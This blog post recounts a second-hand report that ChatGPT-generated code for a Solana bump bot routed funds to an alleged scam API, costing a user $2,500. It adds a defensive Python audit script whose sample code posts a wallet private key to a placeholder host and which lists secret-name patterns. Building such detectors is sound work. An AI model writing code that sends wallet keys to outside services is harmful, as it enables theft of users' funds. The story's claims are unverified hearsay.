Today, another incredible story that was passed on to me by a security expert. Someone tried to use ChatGPT to create code for an application that was supposed to be able to transfer cryptocurrency. Malicious code was built into it, which caused the victim to lose $2,500 to a scam site. The scammer's account is said to have reached $75,000 in the meantime.
ChatGPT can generate code…
The AI application ChatGPT—either from OpenAI or Microsoft—can also be used to generate code. There are people who swear by it and hope it will greatly increase productivity. I have now read several articles that take a more critical view of the whole thing. Poorer code quality, unclear code that finds its way into applications, the problem of copyright infringement, and so on. Somehow, this is not what the marketing strategists who promise the moon want to hear.
ChatGPT software development goes wrong
The episode described below was leaked to me in a tweet on X. Gi7worm often provides me with security insights or findings from the darknet.
The text simply states that you should be careful with what OpenAI's ChatGPT app provides you with. One victim lost $2,500 while attempting to develop software for handling cryptocurrency with the help of ChatGPT. The code generated by ChatGPT included a suggestion to use an API that belongs to a fraudulent website. The scammer's wallet apparently already contained up to $75,000.
Writing a bump bot
The victim writes that he tried to write a bump bot. A bump bot is software used to promote your own offers, e.g., on Discord, and generate followers. To make life easier, or due to a lack of knowledge, the person concerned hoped to achieve his goal with ChatGPT.
The approach of the future victim, asking ChatGPT for help with code creation, initially looked promising. The person states that he asked ChatGPT for help with creating the code and received what he wanted. However, he did not expect ChatGPT to slip him "fraudulent code." Here is the Python code suggested by ChatGPT 4.0.

An API is integrated into the code to handle Solana cryptocurrency. Solana is a public blockchain project that uses a cryptocurrency called Sol. According to Wikipedia, Solana is traded as an alternative to Ethereum and has a market capitalization of US$38 billion. Below, the victim shows the information they received for security and implementation purposes.

It's unclear to me whether the victim also intended to earn or trade Solana cryptocurrency with his bump bot. However, the above code snippet shows that a Solana API is integrated, which points to pump[.]fun.
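A pre-run check for the failure described above, as an added example that is not code from the original post or from ChatGPT: it lists every HTTP host hard-coded in a generated Python file that is not on a reviewer's allowlist, and flags functions that both reference a secret-like name and make an HTTP call. The hostnames, the allowlist, the name hints and the sample snippet are constructed assumptions; that the sample puts a wallet key into the request is part of the constructed input, not a statement about the victim's code.

```python
import ast
from urllib.parse import urlparse

# Assumption: hosts the reviewer has vetted (placeholder name).
ALLOWED_HOSTS = {"rpc.vetted-provider.example"}
# Assumption: name fragments that suggest wallet secrets; tune per project.
SECRET_HINTS = ("private_key", "secret", "seed", "mnemonic")
# Method names treated as outbound HTTP calls (requests/httpx style).
NET_CALLS = {"get", "post", "put", "request"}

# Constructed sample of assistant-generated code; hosts are placeholders.
SAMPLE = '''
import requests
API = "https://api.unvetted-service.example/trade"
RPC = "https://rpc.vetted-provider.example"
def buy(private_key, mint, amount):
    payload = {"private_key": private_key, "mint": mint, "amount": amount}
    return requests.post(API, json=payload).json()
'''

def url_host(text):
    """Return the host if text is an http(s) URL, else None."""
    try:
        url = urlparse(text.strip())
    except ValueError:
        return None
    return url.hostname if url.scheme in ("http", "https") else None

def audit(source):
    """Return (unvetted hosts, functions that touch a secret and send HTTP)."""
    hosts, risky = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            host = url_host(node.value)
            if host and host not in ALLOWED_HOSTS:
                hosts.add(host)
        elif isinstance(node, ast.FunctionDef):
            inner = list(ast.walk(node))
            sends = any(isinstance(n, ast.Call) and isinstance(n.func, ast.Attribute)
                        and n.func.attr in NET_CALLS for n in inner)
            names = [n.id.lower() for n in inner if isinstance(n, ast.Name)]
            if sends and any(h in name for name in names for h in SECRET_HINTS):
                risky.add(node.name)
    return sorted(hosts), sorted(risky)

if __name__ == "__main__":
    print(audit(SAMPLE))
```

Both checks are heuristics for a human reviewer: a host built at runtime or a secret passed under an innocuous name will not be reported, so an empty result does not make generated code safe to run with a funded wallet.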

I visited the site (see screenshot above). The site displays a currency rate and allows you to trade funds. The first time I accessed it, $70,000 was listed, but higher amounts have reportedly been displayed there.
The victim claims to have lost $2,500 (presumably from his own crypto wallet) to the scam site at the end of the day.
I know little about cryptocurrencies, but the craziest stories are circulating there. I just read an article where a child cheats crypto investors out of their money several times. A 13-year-old has cheated crypto investors out of amounts similar to the one above by inventing fictitious cryptocurrencies and then setting up a trading exchange. People in this space seem to be crazy with greed. Wired published this article about the case.



